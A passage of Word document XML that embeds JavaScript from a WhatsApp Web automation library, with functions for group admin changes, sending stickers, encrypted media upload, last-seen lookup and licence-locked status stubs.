          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idGroup '0000000000-00000000@g.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idParticipant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window.WAPI.promoteParticipant = async function (idGroup, idParticipant) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = Store.Chat.get(idGroup);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const promote = chat.groupMetadata.participants.get(idParticipant);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await window.Store.Participants.promoteParticipants(chat, [promote]);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Demote Admin of Group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idGroup '0000000000-00000000@g.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idParticipant '000000000000@c.us'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window.WAPI.demoteParticipant = async function (idGroup, idParticipant) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await window.Store.WapQuery.demoteParticipants(idGroup, [idParticipant])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = Store.Chat.get(idGroup);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const demote = chat.groupMetadata.participants.get(idParticipant);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await window.Store.Participants.demoteParticipants(chat, [demote])</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@private</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Send Sticker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} sticker </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param metadata about the image. Based on [sharp metadata](https://sharp.pixelplumbing.com/api-input#metadata)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window.WAPI._sendSticker = async function (sticker, chatId, metadata) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let stick = new window.Store.Sticker.modelClass();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_clientUrl = sticker.clientUrl;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_filehash = sticker.filehash;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_id = sticker.filehash;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_uploadhash = sticker.uploadhash;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_mediaKey = sticker.mediaKey;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_initialized = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.__x_mediaData.mediaStage = 'INIT';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.mimetype = 'image/webp';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.height = (metadata &amp;&amp; metadata.height) ? metadata.height : 512;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    stick.width = (metadata &amp;&amp; metadata.width) ? metadata.width : 512;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await stick.initialize();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await stick.sendToChat(chat);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window.WAPI.getFileHash = async (data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let buffer = await data.arrayBuffer();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var sha = new jsSHA("SHA-256", "ARRAYBUFFER");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sha.update(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sha.getHash("B64");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window.WAPI.generateMediaKey = async (length) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var result = '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var charactersLength = characters.length;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for (var i = 0; i &lt; length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result += characters.charAt(Math.floor(Math.random() * charactersLength));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result;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@param type: The type of file.  {'audio' | 'sticker' | 'video' | 'product' | 'document' | 'gif' | 'image' | 'ptt' | 'template' | 'history' | 'ppic'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param blob: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window.WAPI.encryptAndUploadFile = async function (type, blob) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let filehash = await window.WAPI.getFileHash(blob);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let mediaKey = await window.WAPI.generateMediaKey(32);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let controller = new AbortController();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let signal = controller.signal;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let encrypted = await window.Store.UploadUtils.encryptAndUpload({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        blob,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaKey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...encrypted,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        clientUrl: encrypted.url,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        filehash,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: filehash,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        uploadhash: encrypted.encFilehash,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Send Image As Sticker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} imageBase64 A valid webp image is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param metadata about the image. Based on [sharp metadata](https://sharp.pixelplumbing.com/api-input#metadata)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window.WAPI.sendImageAsSticker = async function (imageBase64, chatId, metadata) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let mediaBlob = await window.WAPI.base64ImageToFile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        'data:image/webp;base64,' + imageBase64,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        'file.webp'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let encrypted = await window.WAPI.encryptAndUploadFile("sticker", mediaBlob);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await window.WAPI._sendSticker(encrypted, chatId, metadata);</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This will dump all possible stickers into the chat. ONLY FOR TESTING. THIS IS REALLY ANNOYING!!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window.WAPI._STICKERDUMP = async function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let prIdx = await Store.StickerPack.pageWithIndex(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.StickerPack.fetchAt(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.StickerPack._pageFetchPromises[prIdx];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Promise.race(Store.StickerPack.models.forEach(pack =&gt; pack.stickers.fetch().then(_ =&gt; pack.stickers.models.forEach(stkr =&gt; stkr.sendToChat(chat))))).catch(e =&gt; {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window.WAPI.getLastSeen = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Store.Chat.get(id)) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let { presence } = Store.Chat.get(id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await presence.subscribe();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return presence.chatstate.t;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window.WAPI.getUseHereString = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!window.l10n.localeStrings['en']) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const originalLocale = window.l10n.getLocale();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await window.l10n.init('en');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await window.l10n.init(originalLocale)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 window.l10n.localeStrings[window.l10n.getLocale()][0][window.l10n.localeStrings.en[0].findIndex(x =&gt; x.toLowerCase() === 'use here')]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window.WAPI.getAmountOfLoadedMessages = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.Msg.models.length;</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WAPI.getChatWithNonContacts = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.Chat.models.map(chat =&gt; chat.contact &amp;&amp; !chat.contact.isMyContact ? chat.contact : null).filter(x =&gt; x &amp;&amp; !x.isGroup).map(WAPI._serializeContactObj)</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window.WAPI.cutMsgCache = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Store.Msg.models.map(msg =&gt; Store.Msg.remove(msg));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return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window.WAPI.getHostNumber = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return WAPI.getMe().me.user;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//All of the following features can be unlocked using a license key: https://github.com/open-wa/wa-automate-nodejs#license-key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getStoryStatusByTimeStamp = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.deleteAllStatus = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getMyStatusArray = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.deleteStatus = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
